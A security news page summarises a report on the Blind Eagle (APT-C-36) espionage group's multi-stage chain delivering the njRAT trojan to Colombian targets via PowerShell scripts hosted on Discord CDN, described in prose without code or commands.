Security News > 2023 > April > Blind Eagle Cyber Espionage Group Strikes Again: New Attack Chain Uncovered
The cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
"The group is known for using a variety of sophisticated attack techniques, including custom malware, social engineering tactics, and spear-phishing attacks," ThreatMon said in a Tuesday report.
Blind Eagle, also referred to as APT-C-36, is a suspected Spanish-speaking group that chiefly strikes private and public sector entities in Colombian.
Infection chains documented by Check Point and BlackBerry this year have revealed the use of spear-phishing lures to deliver commodity malware families like BitRAT, AsyncRAT, and in-memory Python loaders capable of launching a Meterpreter payload. The latest discovery from ThreatMon entails the use of a JavaScript downloader to execute a PowerShell script hosted in Discord CDN. The script, in turn, drops another PowerShell script and a Windows batch file, and saves a VBScript file in the Windows startup folder to achieve persistence.
The VBScript code is then run to launch the batch file, which is subsequently deobfuscated to run the PowerShell script that was previously delivered along with it.
In the final stage, the PowerShell script is used to execute njRAT. "NjRAT, also known as Bladabindi is a remote access tool with user interface or trojan which allows the holder of the program to control the end-user's computer," the cybersecurity firm said.
News URL
https://thehackernews.com/2023/04/blind-eagle-cyber-espionage-group.html
Related news
- Reminder: China-backed crews compromised 'multiple' US telcos in 'significant cyber espionage campaign' (source)
- FBI confirms China-linked cyber espionage involving breached telecom providers (source)
- Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks (source)
- Hackers Weaponize Visual Studio Code Remote Tunnels for Cyber Espionage (source)